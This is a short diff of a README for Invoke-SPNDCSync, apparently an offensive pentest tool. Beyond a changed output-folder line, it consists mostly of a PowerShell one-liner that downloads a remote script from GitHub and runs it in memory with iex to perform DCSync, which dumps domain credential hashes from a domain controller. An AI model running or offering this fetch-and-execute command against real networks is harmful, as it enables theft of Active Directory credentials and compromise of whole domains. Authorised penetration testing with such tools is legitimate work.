pentestfactory/Invoke-SPNDCSync/README.md

 Download ``Invoke-SPNDCSync.ps1`` into memory, which executes the DCSync process.

-As a result, we will obtain our files located under C:\temp\SPN-DCSYNC\ directory:
+As a result, we will obtain our files located under C:\temp\ directory:

 ````
 iex(new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/pentestfactory/Invoke-SPNDCSync/main/Invoke-SPNDCSync.ps1')